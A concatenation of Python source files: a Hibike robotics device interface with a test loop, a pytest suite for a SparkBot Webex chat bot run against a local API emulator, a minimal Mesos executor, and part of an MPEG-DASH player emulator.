from multiprocessing import Process, Pipe, Queue
from runtime import hibike_process
from runtime import hibike_message
class Hibike:
"""
Interface to a separate Hibike process.
"""
DEFAULT_DELAY = 100
def __init__(self):
self.bad_things_queue = Queue()
self.state_queue = Queue()
self.pipe_to_child, self.pipe_from_child = Pipe()
self.hibike_process = Process(target=hibike_process.hibike_process,
args=(self.bad_things_queue,
self.state_queue, self.pipe_from_child))
self.hibike_process.daemon = True
self.hibike_process.start()
self.uids = set()
self.terminating = threading.Event()
self.out_thread = threading.Thread(target=self.process_output)
self.out_thread.start()
self.device_values_cache = {}
def process_output(self):
"""
Processes the output uploaded to the state queue by te devices.
If it's a subscription response from a device whose uid is not in
self.uids, the uid will be added to self.uids.
If it's a device disconnection from a device whose uid in self.uids,
the uid will be removed from self.uids.
If it's a device value, cache it in the dictionary.
"""
while not self.terminating.is_set():
try:
command, data = self.state_queue.get(timeout=1)
except queue.Empty:
continue
if command == "device_subscribed":
uid = data[0]
self.uids.add(uid)
elif command == "device_disconnected":
uid = data[0]
self.uids.discard(uid)
elif command == "device_values":
for uid, params in data[0].items():
for key, value in params:
self.device_values_cache.setdefault(uid, {})[key] = value
def get_last_cached(self, uid, param):
"""
Get the last value of PARAM received from the device at UID.
Precondition: a device_data with a UID, params, and values must have been
received from the param before calling this function.
"""
try:
return self.device_values_cache[uid][param]
except KeyError:
print("Could not get parameter {} from {}".format(param, uid))
return None
def get_uids_and_types(self):
"""
Returns a list of tuples of all of the uids of all devices that the
HibikeCommunicator talks to. Tuple structure: (uid, device type name).
"""
return [(uid, hibike_message.uid_to_device_name(uid)) for uid in self.uids]
def enumerate(self):
"""
Enumerate all devices.
"""
self.pipe_to_child.send(["enumerate_all", []])
def subscribe(self, uid, delay, params):
"""
Subscribe to device UID, with DELAY delay, and parameters PARAMS.
"""
self.pipe_to_child.send(["subscribe_device", [uid, delay, params]])
def subscribe_all(self):
"""
Subscribe to all devices with all parameters.
"""
for uid in self.uids:
dev_id = hibike_message.uid_to_device_id(uid)
all_params = hibike_message.all_params_for_device_id(dev_id)
readable_params = []
for param in all_params:
if hibike_message.readable(dev_id, param):
readable_params.append(param)
self.pipe_to_child.send(["subscribe_device", [uid, self.DEFAULT_DELAY,
readable_params]])
def write(self, uid, params_and_values):
"""
Write PARAMS_AND_VALUES to the device at UID.
"""
self.pipe_to_child.send(["write_params", [uid, params_and_values]])
def read(self, uid, params):
"""
Read PARAMS from the device at UID.
"""
self.pipe_to_child.send(["read_params", [uid, params]])
def disable(self):
"""
Disable all attached devices.
"""
self.pipe_to_child.send(["disable_all", []])
def terminate(self):
"""
Terminate the hibike process and clean up resources.
"""
self.hibike_process.terminate()
self.terminating.set()
self.out_thread.join()
# pylint: disable=too-many-branches, too-many-statements
def run_test():
comms = Hibike()
time.sleep(3)
device_info = comms.get_uids_and_types()
for uid, device_type in device_info:
print("Device info packet:", (uid, device_type))
print("Type:", device_type)
if device_type == "LimitSwitch":
while True:
comms.subscribe(uid, 100, ["switch0", "switch1", "switch2", "switch3"])
time.sleep(0.05)
print("Uid:", uid)
print("Last cached, switch0 and switch1:")
print(comms.get_last_cached(uid, "switch0"))
print(comms.get_last_cached(uid, "switch1"))
time.sleep(0.5)
elif device_type == "LineFollower":
while True:
comms.subscribe(uid, 100, ["left", "center", "right"])
time.sleep(0.05)
print("Uid:", uid)
print("Last cached, all params:")
print(comms.get_last_cached(uid, "left"))
print(comms.get_last_cached(uid, "right"))
time.sleep(0.5)
elif device_type == "Potentiometer":
while True:
comms.subscribe(uid, 100, ["pot0", "pot1", "pot2", "pot3"])
time.sleep(0.05)
print("Uid:", uid)
print("Last cached, pot0 and pot2:")
print(comms.get_last_cached(uid, "pot0"))
print(comms.get_last_cached(uid, "pot1"))
time.sleep(0.5)
elif device_type == "Encoder":
while True:
comms.read(uid, ["rotation"])
time.sleep(0.05)
comms.read(uid, ["rotation"])
time.sleep(0.05)
comms.read(uid, ["rotation"])
time.sleep(0.5)
elif device_type == "BatteryBuzzer":
while True:
comms.subscribe(uid, 100, ["cell1", "cell2", "cell3", "calibrate"])
time.sleep(0.05)
comms.write(uid, ("calibrate", True))
time.sleep(0.05)
comms.write(uid, ("calibrate", False))
time.sleep(0.05)
print("Uid:", uid)
print("Last cached, calibrate and cell2:")
print(comms.get_last_cached(uid, "calibrate"))
print(comms.get_last_cached(uid, "cell2"))
time.sleep(0.5)
elif device_type == "TeamFlag":
while True:
comms.subscribe(uid, 100, ["led1", "led2", "led3", "led4", "blue", "yellow"])
time.sleep(0.05)
comms.write(uid, [("led1", True), ("led2", True), ("led3", False),
("led4", False), ("blue", True), ("yellow", False)])
time.sleep(0.05)
comms.write(uid, [("led1", False), ("led2", False), ("led3", True),
("led4", True), ("blue", False), ("yellow", True)])
time.sleep(0.05)
print("Uid:", uid)
print("Last cached, blue and yellow:")
print(comms.get_last_cached(uid, "blue"))
print(comms.get_last_cached(uid, "yellow"))
time.sleep(0.5)
elif device_type == "YogiBear":
while True:
comms.subscribe(uid, 100, ["duty", "forward"])
time.sleep(0.05)
comms.write(uid, [("duty", 100), ("forward", False)])
time.sleep(0.05)
comms.write(uid, [("duty", 50), ("forward", True)])
time.sleep(0.05)
print("Uid:", uid)
print("Last cached, all params:")
print(comms.get_last_cached(uid, "duty"))
print(comms.get_last_cached(uid, "forward"))
time.sleep(0.5)
elif device_type == "ServoControl":
while True:
comms.subscribe(uid, 100, ["servo0", "enable0", "servo1", "enable1",
"servo2", "enable2", "servo3", "enable3"])
time.sleep(0.05)
comms.write(uid, [("servo0", 3), ("enable0", False), ("servo1", 3),
("enable1", False), ("servo2", 3), ("enable2", True),
("servo3", 3), ("enable3", False)])
time.sleep(0.05)
comms.write(uid, [("servo0", 1), ("enable0", True), ("servo1", 26),
("enable1", True), ("servo2", 30), ("enable2", False),
("servo3", 17), ("enable3", True)])
time.sleep(0.05)
print("Uid:", uid)
print("Last cached, servo1 and enable1:")
print(comms.get_last_cached(uid, "servo1"))
print(comms.get_last_cached(uid, "enable1"))
time.sleep(0.5)
elif device_type == "ExampleDevice":
while True:
comms.subscribe(uid, 100, ["kumiko", "hazuki", "sapphire", "reina",
"asuka", "haruka", "kaori", "natsuki", "yuko",
"mizore", "nozomi", "shuichi", "takuya",
"riko", "aoi", "noboru"])
time.sleep(0.05)
comms.write(uid, [("kumiko", True), ("hazuki", 19), ("sapphire", 12),
("reina", 210), ("asuka", 105), ("haruka", 1005),
("kaori", 551), ("natsuki", 18002), ("yuko", 9001),
("mizore", 6.45), ("nozomi", 33.2875), ("takuya", 331),
("aoi", 7598)])
time.sleep(0.05)
comms.write(uid, [("kumiko", False), ("hazuki", 0), ("sapphire", 0),
("reina", 0), ("asuka", 0), ("haruka", 0), ("kaori", 0),
("natsuki", 0), ("yuko", 0), ("mizore", 0.0), ("nozomi", 0.0),
("takuya", 0), ("aoi", 0)])
time.sleep(0.05)
print("Uid:", uid)
print("Last cached, kumiko and hazuki:")
print(comms.get_last_cached(uid, "kumiko"))
print(comms.get_last_cached(uid, "hazuki"))
time.sleep(0.5)
elif device_type == "RFID":
while True:
comms.subscribe(uid, 100, ["id", "detect_tag"])
time.sleep(0.05)
comms.read(uid, ["id"])
time.sleep(0.05)
print("Uid:", uid)
print("Last cached, all params:")
print(comms.get_last_cached(uid, "id"))
print(comms.get_last_cached(uid, "detect_tag"))
time.sleep(0.5)
else:
raise TypeError("ERROR: unknown device type detected")
|
test_all.py | import pytest
import subprocess
import server
from random import SystemRandom
import string
from unittest import mock
from multiprocessing import Process
from time import sleep
from sparkbot import SparkBot, receiver
from sparkbot.exceptions import CommandSetupError
from wsgiref import simple_server
import requests
from requests.exceptions import ConnectionError
from ciscosparkapi import CiscoSparkAPI
class TestAPI:
def random_bytes(self, length):
"""Returns a random bytes array with uppercase and lowercase letters, of length length"""
cryptogen = SystemRandom()
my_random_string = ''.join([cryptogen.choice(string.ascii_letters) for _ in range(length)])
my_random_bytes = my_random_string.encode(encoding='utf_8')
return my_random_bytes
@pytest.fixture(scope="session")
def emulator_prereqs(self):
""" Ensures that the WebEx API emulator can be run """
# Make sure we can start node
try:
subprocess.run("node -v", shell=True, check=True)
except subprocess.CalledProcessError:
pytest.fail("Unable to execute Node. I won't be able to test the bot. Please install node.js and try again.")
return True
@pytest.fixture(scope="session")
def emulator_server_zip(self, tmpdir_factory, emulator_prereqs):
""" Returns a zipfile.ZipFile containing an installed emulator server """
from subprocess import CalledProcessError
import zipfile
import shutil
from urllib.request import urlretrieve
import os
tmpdir = tmpdir_factory.mktemp("emulator")
fresh_emulator_zip = ".testcache/webex-api-emulator-fresh.zip"
fresh_emulator_zip_extract_dir = tmpdir.join("webex-api-emulator")
installed_emulator_zip_filename = ".testcache/webex-api-emulator-installed"
try:
os.mkdir(".testcache")
except FileExistsError:
pass
urlretrieve("https://github.com/webex/webex-api-emulator/archive/master.zip", fresh_emulator_zip)
with zipfile.ZipFile(fresh_emulator_zip) as myzip:
first_member = myzip.namelist()[0]
myzip.extractall(path=str(fresh_emulator_zip_extract_dir))
built_server_directory = fresh_emulator_zip_extract_dir.join(first_member)
print("Building zip")
try:
subprocess.run(["npm install"], shell=True, check=True, cwd=str(built_server_directory))
except CalledProcessError:
pytest.fail("Failed to run `npm install`. Try again in a few seconds, then try deleting the '.testcache' folder.")
# Pack the installed files into a new zip
installed_emulator_zip = shutil.make_archive(installed_emulator_zip_filename,
"zip",
str(built_server_directory))
newzip_read = zipfile.ZipFile(installed_emulator_zip)
yield newzip_read
newzip_read.close()
@pytest.fixture
def emulator_server_files(self, tmpdir, emulator_server_zip):
""" Returns a path to a WebEx API emulator in temporary storage as a `py._path.local`_
.. _py._path.local:https://py.readthedocs.io/en/latest/path.html#py._path.local.LocalPath
"""
emulator_server_zip.extractall(path=str(tmpdir))
# Python 3.6+ had a behavior change for zip files. Zipfiles created on
# 3.5 have `webex-api-emulator-master` as their first component. 3.6+
# zipfiles do not have this.
zip_component = ""
if emulator_server_zip.namelist()[0] == "webex-api-emulator-master/":
zip_component = "webex-api-emulator-master/"
return tmpdir.join(zip_component)
@pytest.fixture(scope="session")
def unique_port(self):
""" Returns a generator that counts up, used for port numbers for the emulator server.
To use this counter, use 'unique_port.__next()'
"""
from itertools import count
return count(start=10001)
@pytest.fixture
def emulator_server(self, emulator_server_files, unique_port):
""" Starts up and returns a WebEx API emulator as a server.WebexAPIEmulator """
port = unique_port.__next__()
emulator = server.WebexAPIEmulator(emulator_server_files, port)
emulator.start()
yield emulator
emulator.stop()
def get_spark_api(self, server):
"""
Returns a ciscosparkapi.CiscoSparkAPI object for the server.WebexAPIEmulator
specified by 'server'
"""
return CiscoSparkAPI(base_url=server.url, access_token=server.bot_token)
@pytest.fixture
def full_bot_setup(self, emulator_server, unique_port):
""" Sets up everything needed to test a bot, including a set-up webhook and receiver
To use this fixture, first run ``full_bot_setup["receiver_process"].start()`` to run the
receiver AFTER you have added commands to the bot. Next, ``GET receiver_webhook_url`` to
prevent a race condition between the server startup and your test. Then, use
``self.invoke_bot()`` or your preferred method to get a response from the bot.
:returns: Dict with the format
{
"bot": sparkbot.SparkBot,
"receiver": sparkbot.receiver,
"bot_api": ciscosparkapi.CiscoSparkAPI,
"aux_api": ciscosparkapi.CiscoSparkAPI,
"emulator": server.WebexAPIEmulator,
"receiver_process": subprocessing.Process,
"receiver_webhook_url": str
}
``aux_api`` is a second Spark API set up for the given emulator.
"""
from logging import getLogger
return_items = {}
return_items["bot_api"] = self.get_spark_api(emulator_server)
receiver_port = unique_port.__next__()
return_items["receiver_webhook_url"] = "http://127.0.0.1:" + str(receiver_port)
return_items["aux_api"] = CiscoSparkAPI(base_url=emulator_server.url,
access_token="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ")
return_items["bot"] = SparkBot(return_items["bot_api"],
root_url = return_items["receiver_webhook_url"],
logger = getLogger(name="Bot"))
secret = self.random_bytes(32)
return_items["receiver"] = receiver.create(return_items["bot"])
return_items["emulator"] = emulator_server
return_items["bot_api"].webhooks.create("myBot",
return_items["receiver_webhook_url"],
"messages",
"created",
secret=secret.decode())
receiver_server = simple_server.make_server("localhost",
receiver_port,
return_items["receiver"])
receiver_process = Process(target=receiver_server.serve_forever)
return_items["receiver_process"] = receiver_process
yield return_items
receiver_process.terminate()
receiver_process.join()
def start_receiver(self, receiver_process, url):
""" Starts the receiver held by receiver_process and waits for it to come up.
receiver_process should be a multiprocessing.Process, its target should be receiver.run().
url is the receiver URL that this method will expect to be able to reach when the receiver
is up.
"""
# It would be simpler to start the server in the full_bot_setup fixture, but that isn't
# possible due to the way that Python multiprocessing works. Specifically, trying to add
# new commands to the bot after starting a receiver will always fail since the process
# "holds" the old version of the bot.
receiver_process.start()
while True:
try:
r = requests.get(url)
print(r.status_code)
break
except ConnectionError:
pass
def invoke_bot(self, spark_api, bot_id, bot_displayname, markdown, room_name="Test", expected_replies=1, timeout=10):
""" Creates a new room, adds the bot, and messages the bot using the markdown specified.
:param spark_api: ciscosparkapi.CiscoSparkAPI of another user (not the bot we're testing)
:param bot_id: ID of the bot that we are invoking
:param bot_displayname: Display name of the bot that we are invoking
:param markdown: markdown-formatted message to send to the bot
:param room_name: The name of the room to create. Must be provided unique within each test.
Failure to provide a unique name will cause unexpected results.
:param expected_replies: The number of replies to wait for from the bot
:param timeout: Maximum number of seconds to wait for the bot to respond.
:returns: Response from bot as a ciscosparkapi.Message if ``expected_replies`` is 1,
list of responses from bot if it is greater than 1.
"""
message = "<@personId:{}|{}> ".format(bot_id, bot_displayname) + markdown
room = spark_api.rooms.create(room_name)
spark_api.memberships.create(roomId=room.id, personId=bot_id)
spark_api.messages.create(roomId=room.id, markdown=message)
sleep(1)
bot_replies = []
# Timeout*2 because we're sleeping for 0.5 seconds and incrementing i by 1 each time
for i in range(0, timeout*2):
# Pull each message from the test room. If we match one that's already in bot_replies,
# go on to the next one. Otherwise, if the reply came from the bot, store it.
for message in spark_api.messages.list(room.id):
if message.personId == bot_id and not message.id in [stored_message.id for stored_message in bot_replies]:
bot_replies.append(message)
next
if len(bot_replies) == expected_replies or i >= timeout:
break
else:
sleep(0.5)
# Order the replies by their send time
bot_replies.sort(key=lambda r: r.created)
if expected_replies == 1:
return bot_replies[0]
else:
return bot_replies
def test_server_sanity(self, emulator_server):
"""Ensures the API server is sane"""
spark_api = self.get_spark_api(emulator_server)
me = spark_api.people.me()
assert me.displayName == emulator_server.bot_displayname
assert me.lastName == emulator_server.bot_lastname
assert me.firstName == emulator_server.bot_firstname
assert me.orgId == emulator_server.bot_org
assert me.nickName == emulator_server.bot_nickname
assert me.emails == emulator_server.bot_emails
assert me.id == emulator_server.bot_id
def test_add_command(self, emulator_server):
"""Tests use of the @SparkBot.command() decorator to add a command to the bot"""
from sparkbot import SparkBot
spark_api = self.get_spark_api(emulator_server)
bot = SparkBot(spark_api)
@bot.command("ping")
def ping(caller, room_id):
return 'pong'
assert bot.commands["ping"].execute() == "pong"
def test_callback(self, emulator_server):
"""Tests the bot's ability to give a callback function"""
spark_api = self.get_spark_api(emulator_server)
bot = SparkBot(spark_api)
room_id = "ASDF1234"
temp_respond = mock.MagicMock()
@bot.command("callback")
def callingback(callback):
callback("Some markdown")
bot.commands["callback"].execute(room_id=room_id, callback=temp_respond)
assert temp_respond.called_with(room_id, "Some markdown")
def test_full_nocommand(self, full_bot_setup):
"""Tests the bot's error handling when an incorrect command is given"""
bot = full_bot_setup["bot"]
aux_api = full_bot_setup["aux_api"]
emulator = full_bot_setup["emulator"]
self.start_receiver(full_bot_setup["receiver_process"], full_bot_setup["receiver_webhook_url"])
bot_reply = self.invoke_bot(full_bot_setup["aux_api"],
emulator.bot_id,
emulator.bot_displayname,
"ping")
assert "Command not found" in bot_reply.text
def test_full_ping(self, full_bot_setup):
"""Tests a ping command through the emulator"""
bot = full_bot_setup["bot"]
emulator = full_bot_setup["emulator"]
@bot.command("ping")
def ping():
return "pong"
self.start_receiver(full_bot_setup["receiver_process"], full_bot_setup["receiver_webhook_url"])
bot_reply = self.invoke_bot(full_bot_setup["aux_api"],
emulator.bot_id,
emulator.bot_displayname,
"ping")
assert "pong" in bot_reply.text
def test_full_bad_formatting(self, full_bot_setup):
"""Tests that an incorrectly formatted command returns an error safely"""
emulator = full_bot_setup["emulator"]
self.start_receiver(full_bot_setup["receiver_process"], full_bot_setup["receiver_webhook_url"])
# Wait for server to come up
requests.get(full_bot_setup["receiver_webhook_url"])
bot_reply = self.invoke_bot(full_bot_setup["aux_api"],
emulator.bot_id,
emulator.bot_displayname,
"Command 'without completed quotes")
assert "format" in bot_reply.text
def test_command_strings_list(self, full_bot_setup):
"""Tests that a command can be called by multiple names"""
bot = full_bot_setup["bot"]
aux_api = full_bot_setup["aux_api"]
emulator = full_bot_setup["emulator"]
@bot.command(["ping", "ding"])
def ping():
return "pong"
self.start_receiver(full_bot_setup["receiver_process"], full_bot_setup["receiver_webhook_url"])
bot_reply_1 = self.invoke_bot(aux_api,
emulator.bot_id,
emulator.bot_displayname,
"ping",
room_name="test1")
bot_reply_2 = self.invoke_bot(aux_api,
emulator.bot_id,
emulator.bot_displayname,
"ding",
room_name="test2")
assert "pong" in bot_reply_1.text and "pong" in bot_reply_2.text
def test_full_help(self, full_bot_setup):
"""Tests the default help-all command (and the default help command's ability to call it)"""
aux_api = full_bot_setup["aux_api"]
emulator = full_bot_setup["emulator"]
self.start_receiver(full_bot_setup["receiver_process"], full_bot_setup["receiver_webhook_url"])
bot_reply_1 = self.invoke_bot(aux_api,
emulator.bot_id,
emulator.bot_displayname,
"help",
room_name="test1")
bot_reply_2 = self.invoke_bot(aux_api,
emulator.bot_id,
emulator.bot_displayname,
"help all",
room_name="test3")
assert bot_reply_1.markdown == (
"""Type `help [command]` for more specific help about any of these commands:
- help"""
)
assert bot_reply_1.markdown == bot_reply_2.markdown
def test_full_internal_error_text(self, full_bot_setup):
"""Tests that unhandled exceptions in commands with error text are handled safely"""
bot = full_bot_setup["bot"]
aux_api = full_bot_setup["aux_api"]
emulator = full_bot_setup["emulator"]
@bot.command("exception")
def cause_exception():
raise ValueError("Whoops", "Hey, an exception")
self.start_receiver(full_bot_setup["receiver_process"], full_bot_setup["receiver_webhook_url"])
bot_reply = self.invoke_bot(aux_api, emulator.bot_id, emulator.bot_displayname, "exception", room_name="test1")
assert bot_reply.text == "⚠️ Error: Hey, an exception"
def test_full_internal_error(self, full_bot_setup):
"""Tests that unhandled exceptions in commands without error text are handled safely"""
bot = full_bot_setup["bot"]
aux_api = full_bot_setup["aux_api"]
emulator = full_bot_setup["emulator"]
@bot.command("exception")
def cause_exception():
raise ValueError("Whoops")
self.start_receiver(full_bot_setup["receiver_process"], full_bot_setup["receiver_webhook_url"])
bot_reply = self.invoke_bot(aux_api, emulator.bot_id, emulator.bot_displayname, "exception", room_name="test1")
assert bot_reply.text == "⚠️ Error: Something happened internally. For more information, contact the bot author."
def test_full_yield_results(self, full_bot_setup):
"""Tests that ``yield``ing from a function causes multiple replies"""
bot = full_bot_setup["bot"]
aux_api = full_bot_setup["aux_api"]
emulator = full_bot_setup["emulator"]
@bot.command("two-replies")
def two_replies(callback):
yield "Reply 1!"
yield "Reply 2!"
self.start_receiver(full_bot_setup["receiver_process"], full_bot_setup["receiver_webhook_url"])
bot_replies = self.invoke_bot(aux_api, emulator.bot_id, emulator.bot_displayname, "two-replies", expected_replies=2, room_name="test1")
assert bot_replies[0].text == "Reply 1!"
assert bot_replies[1].text == "Reply 2!"
def test_full_fallback(self, full_bot_setup):
"""Tests fallback commands"""
bot = full_bot_setup["bot"]
aux_api = full_bot_setup["aux_api"]
emulator = full_bot_setup["emulator"]
@bot.command(fallback=True)
def fallback():
return "This is the fallback command"
self.start_receiver(full_bot_setup["receiver_process"], full_bot_setup["receiver_webhook_url"])
bot_reply = self.invoke_bot(aux_api, emulator.bot_id, emulator.bot_displayname, "exception", room_name="test1")
assert bot_reply.text == "This is the fallback command"
def test_full_remove_help(self, full_bot_setup):
"""Tests that the Help command can be removed from the bot"""
bot = full_bot_setup["bot"]
aux_api = full_bot_setup["aux_api"]
emulator = full_bot_setup["emulator"]
bot.remove_help()
self.start_receiver(full_bot_setup["receiver_process"], full_bot_setup["receiver_webhook_url"])
bot_reply = self.invoke_bot(aux_api, emulator.bot_id, emulator.bot_displayname, "help", room_name="test1")
assert bot_reply.text == "⚠️ Error: Command not found."
def test_help_multiple_command_names(self, emulator_server):
"""Tests the default help command's ability to group commands"""
# Since we've already tested help and help_all with the full setup, we
# only need to call the function on the bot directly.
spark_api = self.get_spark_api(emulator_server)
bot = SparkBot(spark_api)
@bot.command(["name1", "name2"])
def multiple_names():
pass
@bot.command("z")
def z_command():
pass
bot_reply = bot.my_help_all()
assert bot_reply == (
"""Type `help [command]` for more specific help about any of these commands:
- help
- name1, name2
- z"""
)
def test_fallback_failure_on_multiple(self, emulator_server):
"""Tests that trying to set more than one fallback command fails"""
spark_api = self.get_spark_api(emulator_server)
bot = SparkBot(spark_api)
@bot.command(fallback=True)
def fallback():
return "This is the fallback command"
with pytest.raises(CommandSetupError):
@bot.command(fallback=True)
def second_fallback():
return "This isn't going to work."
def test_receiver_incorrect_hmac(self, emulator_server, unique_port):
"""Tests that the receiver will reject a message with an incorrect signature"""
spark_api = self.get_spark_api(emulator_server)
bot = SparkBot(spark_api)
receiver_port = unique_port.__next__()
webhook_url = ''.join(["http://127.0.0.1:", str(receiver_port), "/sparkbot"])
# Give the receiver an incorrect key
bot.webhook_secret = b"1234"
my_receiver = receiver.create(bot)
# Now, start the receiver in another process...
receiver_server = simple_server.make_server("localhost",
receiver_port,
my_receiver)
receiver_process = Process(target=receiver_server.serve_forever)
self.start_receiver(receiver_process, webhook_url)
try:
# Send a good request to the server with a junk signature.
payload = {
"id": "Y2lzY29zcGFyazovL3VzL1dFQkhPT0svZjRlNjA1NjAtNjYwMi00ZmIwLWEyNWEtOTQ5ODgxNjA5NDk3",
"name": "New message in 'Project Unicorn' room",
"resource": "messages",
"event": "created",
"filter": "roomId=Y2lzY29zcGFyazovL3VzL1JPT00vYmJjZWIxYWQtNDNmMS0zYjU4LTkxNDctZjE0YmIwYzRkMTU0",
"orgId": "OTZhYmMyYWEtM2RjYy0xMWU1LWExNTItZmUzNDgxOWNkYzlh",
"createdBy": "Y2lzY29zcGFyazovL3VzL1BFT1BMRS9mNWIzNjE4Ny1jOGRkLTQ3MjctOGIyZi1mOWM0NDdmMjkwNDY",
"appId": "Y2lzY29zcGFyazovL3VzL0FQUExJQ0FUSU9OL0MyNzljYjMwYzAyOTE4MGJiNGJkYWViYjA2MWI3OTY1Y2RhMzliNjAyOTdjODUwM2YyNjZhYmY2NmM5OTllYzFm",
"ownedBy": "creator",
"status": "active",
"actorId": "Y2lzY29zcGFyazovL3VzL1BFT1BMRS9mNWIzNjE4Ny1jOGRkLTQ3MjctOGIyZi1mOWM0NDdmMjkwNDY",
"data":{
"id": "Y2lzY29zcGFyazovL3VzL01FU1NBR0UvOTJkYjNiZTAtNDNiZC0xMWU2LThhZTktZGQ1YjNkZmM1NjVk",
"roomId": "Y2lzY29zcGFyazovL3VzL1JPT00vYmJjZWIxYWQtNDNmMS0zYjU4LTkxNDctZjE0YmIwYzRkMTU0",
"personId": "Y2lzY29zcGFyazovL3VzL1BFT1BMRS9mNWIzNjE4Ny1jOGRkLTQ3MjctOGIyZi1mOWM0NDdmMjkwNDY",
"personEmail": "matt@example.com",
"created": "2015-10-18T14:26:16.000Z"
}
}
r = requests.post(webhook_url, json=payload, headers={"x-spark-signature":"asdf1234"})
finally:
receiver_process.terminate()
receiver_process.join()
assert r.status_code == 403
def test_receiver_junk_data(self, emulator_server, unique_port):
"""Tests that the receiver will reject an incorrectly crafted message"""
spark_api = self.get_spark_api(emulator_server)
bot = SparkBot(spark_api)
receiver_port = unique_port.__next__()
webhook_url = ''.join(["http://127.0.0.1:", str(receiver_port) + "/sparkbot"])
# Give the receiver an incorrect key
bot.webhook_secret = b"1234"
my_receiver = receiver.create(bot)
# Now, start the receiver in another process...
receiver_server = simple_server.make_server("localhost",
receiver_port,
my_receiver)
receiver_process = Process(target=receiver_server.serve_forever)
self.start_receiver(receiver_process, webhook_url)
try:
# Send nothing.
r = requests.post(webhook_url)
finally:
receiver_process.terminate()
receiver_process.join()
assert r.status_code == 400
def test_incorrect_init(self, emulator_server):
"""Tests that the bot will fail to run when given incorrect arguments"""
spark_api = self.get_spark_api(emulator_server)
with pytest.raises(TypeError):
SparkBot("This is not a CiscoSparkAPI")
with pytest.raises(TypeError):
SparkBot(spark_api, logger="This is not a logger")
def test_bad_command_strings(self, emulator_server):
"""Tests that the bot will fail to add a command with the incorrect argument"""
spark_api = self.get_spark_api(emulator_server)
bot = SparkBot(spark_api)
with pytest.raises(CommandSetupError):
@bot.command("")
def ping():
return "pong"
def test_bad_decorator_call(self, emulator_server):
"""Tests that the bot will fail to add a command when command() is called with no arguments"""
spark_api = self.get_spark_api(emulator_server)
bot = SparkBot(spark_api)
with pytest.raises(CommandSetupError):
@bot.command
def ping():
return "pong"
def test_bad_decorator_type(self, emulator_server):
"""Tests that the bot will fail to add a command with the incorrect argument type"""
spark_api = self.get_spark_api(emulator_server)
bot = SparkBot(spark_api)
with pytest.raises(TypeError):
@bot.command(bot)
def ping(bot):
return "pong"
def test_bad_decorator_embedded_type(self, emulator_server):
"""Tests that the bot will fail to add a command with the incorrect argument type"""
spark_api = self.get_spark_api(emulator_server)
bot = SparkBot(spark_api)
with pytest.raises(TypeError):
@bot.command([bot, "stuff"])
def ping():
return "pong"
|
executor-minimal.py | #!/usr/bin/env python2.7
from __future__ import print_function
import site
site.addsitedir('/usr/lib/python2.7/site-packages')
site.addsitedir('/usr/local/lib/python2.7/site-packages')
import sys
import time
from threading import Thread
from mesos.interface import Executor, mesos_pb2
from mesos.native import MesosExecutorDriver
class MinimalExecutor(Executor):
def launchTask(self, driver, task):
def run_task():
update = mesos_pb2.TaskStatus()
update.task_id.value = task.task_id.value
update.state = mesos_pb2.TASK_RUNNING
driver.sendStatusUpdate(update)
print(task.data)
time.sleep(30)
update = mesos_pb2.TaskStatus()
update.task_id.value = task.task_id.value
update.state = mesos_pb2.TASK_FINISHED
driver.sendStatusUpdate(update)
thread = Thread(target=run_task, args=())
thread.start()
if __name__ == '__main__':
driver = MesosExecutorDriver(MinimalExecutor())
sys.exit(0 if driver.run() == mesos_pb2.DRIVER_STOPPED else 1)
|
player.py | #!/usr/bin/env python2.7
"""Experimental MPEG-DASH player emulator."""
import os
import requests
import shutil
import signal
import threading
import time
import scootplayer.bandwidth as bandwidth
import scootplayer.queue as queue
import scootplayer.remote as remote
import scootplayer.reporter as reporter
import scootplayer.representations as representations
import scootplayer.watchdog as watchdog
import scootplayer.progressbar as progressbar
class Player(object):
"""Main player which facilitates interaction between the other modules."""
bandwidth = None
managed_objects = {'download': None,
'playback': None,
'playlist': None,
'representations': None,
'reporter': None,
'watchdog': None,
'remote_control': None}
session = None
threads = list()
progress_bar = None
state = 'stop'
directory = ''
current_manifest = ''
def __init__(self, options):
"""Initialise the player and start playback."""
self.options = options
self._setup_signal_handling()
self.managed_objects['remote_control'] = remote.RemoteControl(
self, options)
self.managed_objects['playlist'] = queue.playlist.PlaylistQueue(
player=self, options=options)
self.next()
self._consumer()
def next(self):
"""Move onto the next item in the playlist, resetting everything."""
if self.managed_objects['playlist'].empty():
self.event('empty', 'playlist')
self.exit()
self._directory_setup()
self.managed_objects['reporter'] = reporter.Reporter(self)
self.event('next', 'playing item')
self.pause()
self.session = requests.Session()
adapter = requests.adapters.HTTPAdapter(
pool_connections=int(self.options.conn_pool),
pool_maxsize=int(self.options.conn_pool),
max_retries=int(self.options.max_retries))
self.session.mount('http://', adapter)
self.bandwidth = bandwidth.Bandwidth()
self.current_manifest = self.managed_objects['playlist'].get()
self.managed_objects['representations'] = \
representations.Representations(self, self.current_manifest)
window_size = self.max_seg_duration() * int(
self.options.window_multiplier)
self.managed_objects['download'] = queue.download.DownloadQueue(
player=self, time_buffer_max=int(self.options.max_download_queue),
window_size=window_size)
self.managed_objects['playback'] = queue.playback.PlaybackQueue(
player=self, time_buffer_min=int(
self.managed_objects['representations'].min_buffer),
time_buffer_max=int(self.options.max_playback_queue),
window_size=window_size)
self.progress_bar = self._create_progress_bar()
if self.options.watchdog:
self.managed_objects['watchdog'] = watchdog.Watchdog(self)
self._setup_scheduled_stop(self.options.playback_time)
self.resume()
def _directory_setup(self):
"""Create directory for storing downloads"""
time_now = str(int(time.time()))
self.directory = '/'.join(__file__.split('/')
[:-2]) + '/' + self.options.output + \
'/' + time_now
self.create_directory()
def _consumer(self):
"""
Fetch a representation matching the current bandwidth. Add this to the
download queue.
If the player is not playing, wait for a second before
checking again if the playback is resumed.
"""
while True:
self.progress_bar.next(0)
if self.state == 'play':
representation = self.managed_objects['representations'] \
.candidate(int(self.bandwidth))
if representation:
self.managed_objects['download'].add(representation)
else:
time.sleep(0.01)
else:
time.sleep(0.01)
def _setup_scheduled_stop(self, time_):
"""
If defined in the configuration options, stop the player at a
predetermined time.
"""
if time_:
self.start_timed_thread(time_, self.exit)
def exit(self):
"""Stop playback and exit player."""
self.state = 'exit'
self.stop()
os._exit(0) # TODO: No cleanup on exit
# sys.exit(0)
def pause(self):
"""Pause playback."""
self.state = 'pause'
self._modify_state('pause')
def resume(self):
"""Resume playback."""
self.state = 'play'
self._modify_state('resume')
def stop(self):
"""Stop playback."""
self.state = 'stop'
self.progress_bar.suffix = '0:00 / 0:00 / stop'
self.progress_bar.next(0)
self._modify_state('stop')
def _modify_state(self, method=None):
"""Call given method on each of the managed objects."""
for _, val in self.managed_objects.items():
try:
getattr(val, method)()
except AttributeError:
pass
